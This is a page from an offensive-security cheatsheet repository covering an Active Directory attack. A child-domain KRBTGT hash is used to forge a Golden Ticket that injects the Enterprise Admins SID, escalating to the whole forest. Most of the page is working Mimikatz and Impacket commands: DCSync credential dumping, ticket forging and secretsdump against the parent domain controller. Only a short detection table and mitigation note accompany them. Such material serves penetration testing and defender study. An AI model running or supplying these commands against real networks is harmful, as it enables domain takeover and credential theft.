daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-68-cross-domain-trust-abuse-sid-history.md (3959B)


      1 ---
      2 title: "Attack #68 โ€” Cross-Domain Trust Abuse (SID History)"
      3 description: "In AD forests with multiple domains connected by trust relationships, compromising one child domain gives a path to the forest root domain. By forging aโ€ฆ"
      4 category: active-directory
      5 subcategory: "Trust Abuse"
      6 tags: ["active-directory", "kerberos", "credential-access", "privilege-escalation", "hashing"]
      7 tools: ["Impacket", "Mimikatz", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/๐Ÿ”ถ Attack #68 โ€” Cross-Domain Trust Abuse (SID History).md"
     11 ---
     12 # ๐Ÿ”ถ Attack #68 โ€” Cross-Domain Trust Abuse (SID History)
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 In AD forests with multiple domains connected by **trust relationships**, compromising one child domain gives a path to the forest root domain. By forging a Golden Ticket in the child domain and injecting the **Enterprise Admins SID** from the parent domain into the ticket's `sIDHistory` field (via the `ExtraSids` PAC field), the attacker gains Enterprise Admin privileges across the entire forest.
     19 
     20 This works because **parent-child trust is bidirectional and transitive by default**, and SID filtering is **NOT** enforced on inter-domain trusts within the same forest.
     21 
     22 ***
     23 
     24 ## โš™๏ธ Prerequisites
     25 
     26 | Requirement | Detail |
     27 |---|---|
     28 | **KRBTGT hash of child domain** | Obtained via DCSync in child domain |
     29 | **Child domain SID** | Domain SID of compromised child |
     30 | **Enterprise Admins SID** | Typically the forest root domain SID + `-519` |
     31 
     32 ***
     33 
     34 ## ๐Ÿ’ป Full Commands
     35 
     36 ```powershell
     37 # โ”€โ”€ Get child domain KRBTGT hash โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     38 mimikatz.exe "lsadump::dcsync /domain:child.corp.local /user:krbtgt" exit
     39 
     40 # โ”€โ”€ Get parent domain SID โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     41 Get-ADDomain -Identity corp.local | Select DomainSID
     42 # S-1-5-21-<parent_SID>
     43 # Enterprise Admins = S-1-5-21-<parent_SID>-519
     44 
     45 # โ”€โ”€ Forge Golden Ticket with parent EA SID โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     46 kerberos::golden /user:Administrator /domain:child.corp.local \
     47   /sid:S-1-5-21-<child_SID> /krbtgt:<child_krbtgt_hash> \
     48   /sids:S-1-5-21-<parent_SID>-519 /ptt
     49 # The /sids parameter injects Enterprise Admins SID into ExtraSids PAC field
     50 
     51 # โ”€โ”€ Access parent domain as Enterprise Admin โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     52 dir \\PARENT-DC.corp.local\C$
     53 lsadump::dcsync /domain:corp.local /user:krbtgt
     54 ```
     55 
     56 ```bash
     57 # โ”€โ”€ Impacket โ€” forge ticket with extra SID โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     58 ticketer.py -nthash <child_krbtgt_hash> \
     59   -domain-sid S-1-5-21-<child_SID> \
     60   -domain child.corp.local \
     61   -extra-sid S-1-5-21-<parent_SID>-519 \
     62   Administrator
     63 
     64 export KRB5CCNAME=Administrator.ccache
     65 secretsdump.py -k -no-pass corp.local/Administrator@PARENT-DC.corp.local
     66 ```
     67 
     68 ***
     69 
     70 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     71 
     72 | Event ID | Source | What to Look For |
     73 |---|---|---|
     74 | **4769** | Security Log (DC) | TGS request from child domain for parent domain resources |
     75 | **4624** | Security Log | Logon with Enterprise Admin SID in token but no EA group membership |
     76 
     77 ***
     78 
     79 ## ๐Ÿ”— Attack Chain Context
     80 
     81 ```
     82 [Cross-Domain Trust] โ”€โ”€โ†’ Child Domain โ†’ Enterprise Admin in entire forest
     83          โ”‚
     84          โ”œโ”€โ”€โ†’ ๐Ÿ”— Golden Ticket /sids = ExtraSids SID injection
     85          โ”œโ”€โ”€โ†’ โš ๏ธ SID filtering NOT enforced within forest trusts
     86          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: SID filtering on external trusts, selective auth
     87 ```
     88 
     89 ***
     90 
     91 > โœ… **Attack #68 โ€” Cross-Domain Trust Abuse complete.**